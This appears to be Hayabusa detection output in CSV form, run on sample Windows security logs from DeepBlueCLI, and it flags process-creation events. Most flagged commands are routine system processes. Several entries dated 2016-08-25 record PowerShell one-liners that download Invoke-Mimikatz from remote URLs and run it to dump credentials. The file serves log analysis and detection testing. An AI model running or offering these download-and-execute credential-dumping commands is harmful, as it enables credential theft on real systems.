2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.611 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:21:09.562 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:00.792 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
